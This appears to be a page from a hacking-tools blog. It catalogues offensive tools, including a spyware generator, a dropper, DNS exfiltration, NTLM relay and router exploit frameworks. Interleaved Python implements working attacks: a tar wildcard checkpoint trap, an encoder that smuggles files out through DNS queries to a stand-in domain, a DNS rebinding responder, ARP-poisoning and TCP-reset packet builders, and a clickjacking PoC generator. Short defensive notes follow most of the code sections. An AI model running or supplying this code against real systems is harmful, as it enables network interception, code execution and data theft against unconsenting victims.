Browsing category: Exploitation

Wildpwn – Tool Used For Unix Wildcard Attacks

Wildpwn is a Python UNIX wildcard attack tool that helps you generate attacks. It is considered a fairly old-school attack vector, but it still works quite often.

Wildpwn Usage

It goes something like this: usage: wildpwn.py [-h] [--file FILE] payload folder Tool to generate unix wildcard attacks positional arguments payload Payload to use: (combined | tar […]
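
The trick Wildpwn's tar payload automates is worth seeing end to end: file names that begin with `--` are expanded by the shell's `*` and then parsed by GNU tar as options, and `--checkpoint-action=exec=` runs a command. The following is an added example, not Wildpwn's own code; it assumes GNU tar is on PATH, uses a throwaway temporary directory, and every file name and the marker file are constructed for the demo.

```python
"""Added example (not Wildpwn's own code): the GNU tar "checkpoint" wildcard
trick that Wildpwn's tar payload automates, run against a throwaway directory.
Assumes GNU tar is on PATH; every file and directory name here is constructed."""
import os
import subprocess
import tempfile


def plant_trap(workdir: str) -> list:
    """Drop the attacker-controlled files into workdir and return the argv a
    shell would build for `tar cf ../backup.tar *` (the victim's cron job)."""
    marker = os.path.join(workdir, "pwned")
    # Harmless payload: it only creates a marker file so execution is observable.
    with open(os.path.join(workdir, "shell.sh"), "w") as fh:
        fh.write(f"#!/bin/sh\ntouch '{marker}'\n")
    with open(os.path.join(workdir, "data.txt"), "w") as fh:
        fh.write("an ordinary file the job is meant to archive\n")
    # File *names* that GNU tar parses as options once the shell expands '*'.
    # --checkpoint=1 fires a checkpoint on the first record written, and the
    # checkpoint action runs our script through /bin/sh in the same directory.
    for name in ("--checkpoint=1", "--checkpoint-action=exec=sh shell.sh"):
        open(os.path.join(workdir, name), "w").close()
    # The shell sorts the expansion ('-' sorts before letters), but GNU tar
    # accepts options anywhere in argv, so the order does not even matter.
    return ["tar", "cf", "../backup.tar"] + sorted(os.listdir(workdir))


def run_backup(workdir: str, safe: bool = False) -> bool:
    """Run the victim's job with a shell glob.  safe=True writes the glob as
    ./* so every expanded name starts with './' and cannot be an option.
    Returns True when the planted payload ran (marker file exists)."""
    pattern = "./*" if safe else "*"
    subprocess.run(f"tar cf ../backup.tar {pattern}", shell=True, cwd=workdir,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return os.path.exists(os.path.join(workdir, "pwned"))


def gnu_tar_available() -> bool:
    """The checkpoint options are GNU tar extensions; busybox and bsdtar lack them."""
    try:
        out = subprocess.run(["tar", "--version"], capture_output=True, text=True)
    except FileNotFoundError:
        return False
    return "GNU tar" in out.stdout


def demo() -> dict:
    """Plant the trap, run the job safely, then unsafely; report what happened.
    The tar results are None when GNU tar is not installed."""
    parent = tempfile.mkdtemp(prefix="wildpwn-demo-")
    workdir = os.path.join(parent, "victim")
    os.mkdir(workdir)
    argv = plant_trap(workdir)
    if not gnu_tar_available():
        return {"argv": argv, "safe": None, "unsafe": None}
    safe = run_backup(workdir, safe=True)     # ./--checkpoint=1 is just a file
    unsafe = run_backup(workdir, safe=False)  # --checkpoint=1 becomes an option
    return {"argv": argv, "safe": safe, "unsafe": unsafe}


if __name__ == "__main__":
    print(demo())
```

The `safe=True` run shows the fix that matters for the defender: write globs as `./*` (or put `--` before them) so no expanded argument can start with a dash. The same pattern applies to the `chown`/`chmod --reference=` and `rsync -e` payloads Wildpwn also offers.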

Singularity – DNS Rebinding Attack Framework

Singularity of Origin is a tool to perform DNS rebinding attacks. It includes the necessary components to rebind the IP address of the attack server's DNS name to the target machine's IP address and to serve attack payloads that exploit vulnerable software on the target machine. It also ships with sample payloads to exploit several vulnerable software versions, […]

ExchangeRelayX – OWA for hackers

ExchangeRelayX is a PoC tool that demonstrates an attacker's ability to perform an SMB- or HTTP-based NTLM relay attack against the EWS endpoint of an on-premises Microsoft Exchange server and compromise the victim's mailbox. The tool presents the attacker with an OWA-like interface, with access to the user's mailbox […]

Apfell – A macOS, Post-Exploit, Red Teaming Framework

Apfell is designed to provide a collaborative and user-friendly interface for operators, managers, and reporting throughout macOS- and Linux-based red teaming. This is a work-in-progress as I have free time, so please bear with me. Installation Get the code from this GitHub repository: git clone https://github.com/its-a-feature/Apfell Install and set up the requirements (Note: the Sanic webserver […]

REXT – Router Exploitation Toolkit

REXT is a toolkit for easy creation and usage of various Python scripts that work with embedded devices.

Requirements: requests, paramiko, beautifulsoup4

Installation: git clone the REXT repository (this is the recommended way if you wish for the REXT update command to work): $ git clone https://github.com/j91321/rext.git or download REXT: $ wget https://github.com/j91321/rext/archive/master.zip $ unzip master.zip Install […]

DNSteal – DNS Exfiltration Tool for Sending Files Over DNS Requests

DNSteal is a Python-based tool that lets you stealthily extract files from a victim machine through DNS requests.

Features: support for multiple files; gzip compression; customisable subdomains, bytes per subdomain and filename length.

Usage: python dnsteal.py [listen_address] [options] Options: -z Unzip incoming files. -v […]
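
What "bytes per subdomain" and the filename option actually constrain is the wire format of a DNS name: labels of at most 63 characters and a whole name of at most 253. The following added example (not DNSteal's code) shows one way to chop a file into query names and reassemble it on the attacker's nameserver; the base32 layout, the sequence-number label, the domain `exfil.example.com` and the 512-byte sample are all constructed for the demo, not DNSteal's own encoding.

```python
"""Added example (not DNSteal's own code): how a file is chopped into DNS
query names and reassembled on the attacker's nameserver.  The label/name
limits are from RFC 1035; the domain, file name and data are constructed."""
import base64

MAX_LABEL = 63    # RFC 1035: a single label is at most 63 characters
MAX_NAME = 253    # practical limit on the whole name in text form


def _b32(raw: bytes) -> str:
    # DNS is case-insensitive, so unpadded base32 survives resolvers that
    # lowercase or randomise the case of query names; hex would cost 2x.
    return base64.b32encode(raw).decode("ascii").rstrip("=").lower()


def _unb32(text: str) -> bytes:
    return base64.b32decode(text.upper() + "=" * ((-len(text)) % 8))


def encode_file(data: bytes, filename: str, domain: str,
                labels_per_query: int = 3) -> list:
    """Return the query names a victim would resolve, one per chunk:
         <seq>.<data label>[.<data label>...].<filename>.<domain>
    The sequence number lets the receiver reorder and de-duplicate."""
    fname = _b32(filename.encode("utf-8"))
    if len(fname) > MAX_LABEL:
        raise ValueError("file name too long for one label")
    # labels_per_query * 63 base32 characters carry this many raw bytes
    raw_per_query = labels_per_query * MAX_LABEL * 5 // 8
    names = []
    for seq, off in enumerate(range(0, len(data), raw_per_query)):
        chunk = _b32(data[off:off + raw_per_query])
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        name = ".".join([f"{seq:08x}", *labels, fname, domain])
        if len(name) > MAX_NAME:
            raise ValueError("domain too long; lower labels_per_query")
        names.append(name)
    return names


def decode_queries(names, domain: str) -> dict:
    """Reassemble {filename: bytes} from observed query names.  Names under
    other domains are ignored; duplicates and out-of-order arrival are fine."""
    suffix = "." + domain.lower().rstrip(".")
    files = {}
    for name in names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue
        labels = name[:-len(suffix)].split(".")
        if len(labels) < 3:                 # need seq, data, filename
            continue
        seq = int(labels[0], 16)
        fname = _unb32(labels[-1]).decode("utf-8")
        # each query's chunk was padded on its own, so decode per query
        files.setdefault(fname, {})[seq] = _unb32("".join(labels[1:-1]))
    return {f: b"".join(chunks[s] for s in sorted(chunks))
            for f, chunks in files.items()}


# Constructed sample input: 512 bytes of binary data and a made-up domain.
SAMPLE = bytes(range(256)) * 2
DOMAIN = "exfil.example.com"

if __name__ == "__main__":
    queries = encode_file(SAMPLE, "secret.bin", DOMAIN)
    print(len(queries), "queries, first one:", queries[0])
    print(decode_queries(reversed(queries), DOMAIN) == {"secret.bin": SAMPLE})
```

For detection, the same limits cut the other way: a domain receiving many distinct, long, high-entropy subdomains with a monotonically increasing first label is exactly the shape a DNS-exfiltration rule should look for.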

RDPY – Tool For Hacking Remote Desktop Protocol

RDPY is an RDP security tool written in Twisted Python, with an RDP man-in-the-middle proxy that can record sessions, and honeypot functionality. RDPY is a pure-Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol (client and server side), built on the event-driven network engine Twisted. RDPY supports standard […]

Findsploit – Find Exploits In Local And Online Databases Instantly

Findsploit is a simple bash script to quickly and easily search both local and online exploit databases. The repository also includes "copysploit", which copies any exploit-db exploit to the current directory, and "compilesploit", which compiles and runs any C exploit (e.g. ./copysploit 1337.c && ./compilesploit 1337.c). To update the script, type findsploit update […]

RouterSploit – Router Exploitation Framework

The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.

Requirements: gnureadline, requests, paramiko, beautifulsoup4

Installation: sudo apt-get install python-requests python-paramiko python-netsnmp git clone https://github.com/reverse-shell/routersploit ./rsf.py RouterSploit consists of various modules that aid penetration testing operations: exploit modules that take advantage of identified vulnerabilities. RouterSploit currently supports a limited number of exploits out […]

sAINT – A Spyware Generator for Windows systems written in Java

sAINT is a Spyware Generator for Windows systems written in Java. Features: keylogger, screenshot capture, webcam capture, persistence. Tested on Kali Linux (rolling edition). How to use: # Install dependencies (you need Maven and the JDK 8 package installed) $ apt install maven default-jdk default-jre openjdk-8-jdk openjdk-8-jre -y # To generate a .EXE using launch4j are […]

SIP Based Audit and Attack Tool: Mr. SIP

Mr.SIP is a tool developed to audit and simulate SIP-based attacks. It was originally developed for academic work on novel SIP-based DDoS attacks and defence approaches; it has since been redeveloped into its current version with the aim of becoming a fully functional SIP-based penetration testing tool. […]

Printer Exploitation Toolkit – Hacking Printers

PRET is a new tool for printer security testing developed in the scope of a Master's Thesis at Ruhr University Bochum. It connects to a device via network or USB and exploits the features of a given printer language. Currently PostScript, PJL and PCL are supported, which are spoken by most laser printers. This allows cool […]

Umbrella – A Phishing Dropper designed for Pentest

Umbrella is a file dropper dedicated to pentesting: it downloads a file onto the target system and then executes it, without the need for a second execution. To compromise the same target again, you need to delete the following folder on the target system: C:\Users\Public\Libraries\Intel Features: download an executable onto the target system; silent execution; if the exe already […]

Tater – A PowerShell implementation of the Hot Potato Windows Privilege Escalation Exploit

Tater is a PowerShell implementation of the Hot Potato Windows privilege escalation exploit. Included in: p0wnedShell (https://github.com/Cn33liz/p0wnedShell), PowerShell Empire (https://github.com/PowerShellEmpire/Empire), PS>Attack (https://github.com/jaredhaight/psattack). How it works: Hot Potato (aka Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS […]

WMD (Weapon of Mass Destruction) – Python framework for IT security tools

WMD is a Python tool with a collection of IT security software. The software is encapsulated in "modules". A module consists of pure Python code and/or external third-party programs. Main functions: 1) To use a module, run the command "use [module_call]", e.g. "use apsniff", to activate the module. 2) The module's options can be […]

JudasDNS – Nameserver DNS poisoning attacks made easy

JudasDNS is a DNS proxy server built to be deployed in place of a compromised nameserver to perform targeted exploitation. Judas works by proxying all DNS queries to the legitimate nameservers for a domain. The magic comes with Judas's rule configurations, which allow you to change DNS responses depending on source IP or DNS query type. This […]
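
Both the Singularity entry above (rebinding the attack server's name to the target's IP) and the JudasDNS rules (different answers per source IP or query type) come down to one thing: an authoritative responder that decides per query what A record to return. The following added example, written for this page and not taken from either project, builds and parses wire-format DNS messages by hand and serves answers with TTL 0 so the client re-resolves; the attacker, target and client addresses are constructed from the RFC 5737 documentation ranges, and the rule format (source-IP prefix, pinned answer) is an assumption, not JudasDNS's actual config syntax.

```python
"""Added example (not Singularity's or JudasDNS's code): a minimal wire-format
DNS A responder that rebinds a name from the attacker's IP to the target's on
the second lookup, with JudasDNS-style rules keyed on source IP.  All IPs and
names are constructed (RFC 5737 documentation ranges)."""
import socket
import struct

QTYPE_A = 1


def _encode_name(qname: str) -> bytes:
    return b"".join(bytes([len(l)]) + l.encode("ascii")
                    for l in qname.rstrip(".").split(".")) + b"\x00"


def build_query(qname: str, qtype: int = QTYPE_A, txid: int = 0x1234) -> bytes:
    """Standard recursive-desired query with one question and no EDNS."""
    return (struct.pack("!6H", txid, 0x0100, 1, 0, 0, 0)
            + _encode_name(qname) + struct.pack("!HH", qtype, 1))


def parse_query(pkt: bytes):
    """Return (txid, qname, qtype) from a query, or from a response's question."""
    txid = struct.unpack("!H", pkt[:2])[0]
    off, labels = 12, []
    while pkt[off]:
        n = pkt[off]
        labels.append(pkt[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n
    qtype = struct.unpack("!H", pkt[off + 1:off + 3])[0]
    return txid, ".".join(labels).lower(), qtype


def build_a_response(txid: int, qname: str, ip: str, ttl: int) -> bytes:
    """Flags 0x8180 (response, RD+RA, NOERROR) and one A answer whose name is
    a compression pointer (0xC00C) back to the question at offset 12."""
    question = _encode_name(qname) + struct.pack("!HH", QTYPE_A, 1)
    answer = (b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_A, 1, ttl, 4)
              + socket.inet_aton(ip))
    return struct.pack("!6H", txid, 0x8180, 1, 1, 0, 0) + question + answer


def build_empty_response(txid: int, qname: str, qtype: int) -> bytes:
    """NOERROR with zero answers, for record types this responder does not serve."""
    return (struct.pack("!6H", txid, 0x8180, 1, 0, 0, 0)
            + _encode_name(qname) + struct.pack("!HH", qtype, 1))


def parse_a_response(pkt: bytes):
    """Return (ip, ttl) of the first answer, or None when there is none."""
    txid, qname, qtype = parse_query(pkt)
    if struct.unpack("!H", pkt[6:8])[0] == 0:          # ANCOUNT
        return None
    off = 12 + len(_encode_name(qname)) + 4 + 2        # question + name pointer
    rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    return socket.inet_ntoa(pkt[off + 10:off + 10 + rdlen]), ttl


class RebindingResolver:
    """First A lookup of a name by a client gets the attacker IP (the browser
    fetches the attack page from it); every later lookup gets the target IP,
    so the page's next same-origin request lands on the internal host.  TTL 0
    asks the client not to cache.  rules = [(src_ip_prefix, ip), ...] pin an
    answer for chosen clients, in the spirit of JudasDNS's per-source rules."""

    def __init__(self, attacker_ip: str, target_ip: str, rules=()):
        self.attacker_ip, self.target_ip = attacker_ip, target_ip
        self.rules = list(rules)
        self.seen = set()

    def answer(self, pkt: bytes, src_ip: str) -> bytes:
        txid, qname, qtype = parse_query(pkt)
        if qtype != QTYPE_A:
            return build_empty_response(txid, qname, qtype)
        for prefix, ip in self.rules:
            if src_ip.startswith(prefix):
                return build_a_response(txid, qname, ip, ttl=0)
        key = (src_ip, qname)
        if key in self.seen:
            return build_a_response(txid, qname, self.target_ip, ttl=0)
        self.seen.add(key)
        return build_a_response(txid, qname, self.attacker_ip, ttl=0)
```

The defensive reading: a service that trusts the `Host` header or binds to all interfaces without authentication is exactly what the second answer reaches, and a resolver that refuses RFC 1918 answers from external nameservers (the "DNS rebinding protection" option on many home routers) blocks the flip.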

Creak – ARP Poison Attack Script

Creak denies the navigation and download capabilities of a target host on the local network by performing an ARP poison attack and sending TCP reset packets in response to every request made to the router. Born as a didactic project for learning the Python language. Installation: $ git clone https://github.com/codepr/creak.git $ cd creak $ python setup.py install or simply clone the […]
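
The two packets that description refers to are simple enough to build by hand, which is the best way to understand what a tool like Creak has to get right: an unsolicited ARP "is-at" reply that rewrites the victim's cache entry for the router, and a TCP RST whose sequence number must fall inside the victim's receive window or it is silently dropped. The following is an added example written for this page, not Creak's code; nothing is sent (that would need a raw socket and root), the frames are only built and decoded in memory, and every MAC and IP address is constructed.

```python
"""Added example (not Creak's own code): the two packets Creak's attack is
built from.  An unsolicited ARP reply points the victim's idea of the router
at the attacker's MAC; a spoofed TCP RST tears down a flow the attacker now
sees.  Nothing is sent; frames are built and checked in memory, and every
address is constructed."""
import socket
import struct

ETH_P_IP, ETH_P_ARP = 0x0800, 0x0806


def _mac(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def arp_reply(claimed_ip: str, claimed_mac: str, target_ip: str, target_mac: str) -> bytes:
    """Ethernet frame with an ARP 'is-at' reply telling target that claimed_ip
    lives at claimed_mac.  Most stacks update their cache on unsolicited replies."""
    eth = _mac(target_mac) + _mac(claimed_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, ETH_P_IP, 6, 4, 2)   # htype, ptype, hlen, plen, op=reply
    arp += _mac(claimed_mac) + socket.inet_aton(claimed_ip)
    arp += _mac(target_mac) + socket.inet_aton(target_ip)
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    """Decode the ARP fields of a frame built by arp_reply (offsets after the
    14-byte Ethernet header and the 8-byte ARP fixed part)."""
    return {"op": struct.unpack("!H", frame[20:22])[0],
            "sender_mac": frame[22:28].hex(":"), "sender_ip": socket.inet_ntoa(frame[28:32]),
            "target_mac": frame[32:38].hex(":"), "target_ip": socket.inet_ntoa(frame[38:42])}


def poison_pair(attacker_mac, victim_ip, victim_mac, router_ip, router_mac):
    """Both halves of a man-in-the-middle: the victim learns router_ip is at
    the attacker, the router learns victim_ip is at the attacker."""
    return (arp_reply(router_ip, attacker_mac, victim_ip, victim_mac),
            arp_reply(victim_ip, attacker_mac, router_ip, router_mac))


def _checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum; returns 0 when run over a valid header."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def tcp_rst(src_ip, src_port, dst_ip, dst_port, seq) -> bytes:
    """IPv4 packet carrying a bare RST.  The receiver only honours it when seq
    is inside its receive window, so seq is taken from the ACK of a segment
    the victim just sent: that is the next byte it expects from the peer."""
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, seq, 0, 5 << 4, 0x04, 0, 0, 0)
    pseudo = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
              + struct.pack("!BBH", 0, 6, len(tcp)))
    tcp = tcp[:16] + struct.pack("!H", _checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip = ip[:10] + struct.pack("!H", _checksum(ip)) + ip[12:]
    return ip + tcp


def rst_for(observed: dict) -> bytes:
    """Given the fields of a segment seen from the victim (src/sport -> dst/dport,
    with its ack), build the RST the remote peer 'would' send back."""
    return tcp_rst(observed["dst"], observed["dport"],
                   observed["src"], observed["sport"], observed["ack"])


def parse_tcp(pkt: bytes) -> dict:
    """Decode addresses, ports, seq/ack, the RST flag, and verify both checksums."""
    ihl = (pkt[0] & 0x0F) * 4
    tcp = pkt[ihl:]
    sport, dport, seq, ack, _off, flags = struct.unpack("!HHIIBB", tcp[:14])
    pseudo = pkt[12:20] + struct.pack("!BBH", 0, 6, len(tcp))
    return {"src": socket.inet_ntoa(pkt[12:16]), "dst": socket.inet_ntoa(pkt[16:20]),
            "sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "rst": bool(flags & 0x04),
            "checksums_ok": _checksum(pkt[:ihl]) == 0 and _checksum(pseudo + tcp) == 0}
```

Detection is straightforward on both fronts: a switch port or sensor that sees ARP replies for the gateway IP from more than one MAC, or a burst of RSTs whose IP TTL differs from the real peer's usual value, is the signature of exactly this script.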

CrackMapExec – Swiss army knife for pentesting Windows/Active Directory

CrackMapExec is your one-stop shop for pentesting Windows/Active Directory environments! From enumerating logged-on users and spidering SMB shares to executing psexec-style attacks, auto-injecting Mimikatz/shellcode/DLLs into memory using PowerShell, dumping the NTDS.dit and more! The biggest improvements over the above tools are: pure Python script, no external tools required; fully concurrent threading; uses ONLY native […]

CJExploiter – Drag and Drop ClickJacking Exploit Tool

CJExploiter is a drag-and-drop ClickJacking exploit development assistance tool. First open "index.html" locally in your browser, enter the target URL and click "View Site". You can dynamically create your own inputs. Finally, by clicking "Exploit It" you can see the PoC. Summary: Clickjacking, also known as a "UI redress attack", is […]
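
Before building a PoC like the one CJExploiter produces, the first check a tester makes is whether the target can be framed at all: `X-Frame-Options` or a CSP `frame-ancestors` directive makes the overlay moot. The following added example, written for this page and not part of CJExploiter, implements that check and generates the classic invisible-iframe overlay page. It assumes the precedence rule from CSP (frame-ancestors wins when both headers are present) and models `ALLOW-FROM` and other unrecognised `X-Frame-Options` values as giving no protection, which is how current browsers treat them; the origins, headers and target URL are constructed.

```python
"""Added example (not CJExploiter's code): the framing check a tester runs
first, and the overlay PoC page a drag-and-drop tool produces.  Assumes CSP
frame-ancestors takes precedence over X-Frame-Options and that ALLOW-FROM /
unknown XFO values are ignored by the browser.  Origins and URLs are constructed."""
import html
from urllib.parse import urlsplit


def _header(headers: dict, name: str):
    for key, value in headers.items():
        if key.lower() == name:
            return value
    return None


def _host_matches(pattern: str, host: str) -> bool:
    if pattern.startswith("*."):
        return host.endswith(pattern[1:])          # *.partner.example
    return pattern == host


def _csp_allows(sources, attacker: str, target: str) -> bool:
    """Evaluate a frame-ancestors source list against the attacker's origin."""
    a = urlsplit(attacker)
    for src in sources:
        s = src.lower()
        if s == "'none'":
            return False
        if s == "*":
            return True
        if s == "'self'":
            if attacker.lower() == target.lower():
                return True
        elif "://" in s:                            # full origin, maybe wildcard host
            p = urlsplit(s)
            if (p.scheme == a.scheme and _host_matches(p.hostname or "", a.hostname or "")
                    and (p.port is None or p.port == a.port)):
                return True
        elif _host_matches(s, a.hostname or ""):    # scheme-less host source
            return True
    return False


def framable_by(headers: dict, attacker_origin: str, target_origin: str) -> bool:
    """True when a page served with these headers can be put in an iframe by
    attacker_origin.  frame-ancestors, when present, decides on its own;
    otherwise DENY / SAMEORIGIN are honoured and anything else (including the
    deprecated ALLOW-FROM) is treated as if the header were absent."""
    csp = _header(headers, "content-security-policy") or ""
    for directive in csp.split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            return _csp_allows(parts[1:], attacker_origin, target_origin)
    xfo = (_header(headers, "x-frame-options") or "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return attacker_origin.lower() == target_origin.lower()
    return True


def build_poc(target_url: str, decoy_text: str = "Click to continue",
              shift_x: int = 0, shift_y: int = 0) -> str:
    """The classic overlay: a decoy button underneath an invisible iframe of
    the target, shifted by (shift_x, shift_y) so the target's real button sits
    exactly over the decoy.  The tester adjusts the shift until they line up."""
    src = html.escape(target_url, quote=True)
    return f"""<!doctype html>
<html><head><meta charset="utf-8"><title>PoC</title>
<style>
  #decoy {{ position: absolute; top: 120px; left: 40px; z-index: 1; }}
  #target {{ position: absolute; top: -{shift_y}px; left: -{shift_x}px;
             width: 1200px; height: 900px; opacity: 0; z-index: 2; border: 0; }}
</style></head>
<body>
<button id="decoy">{html.escape(decoy_text)}</button>
<iframe id="target" src="{src}"></iframe>
</body></html>"""
```

The fix on the target side is the same pair of headers the check reads: `Content-Security-Policy: frame-ancestors 'none'` (or a list of trusted origins) with `X-Frame-Options: DENY` for older clients.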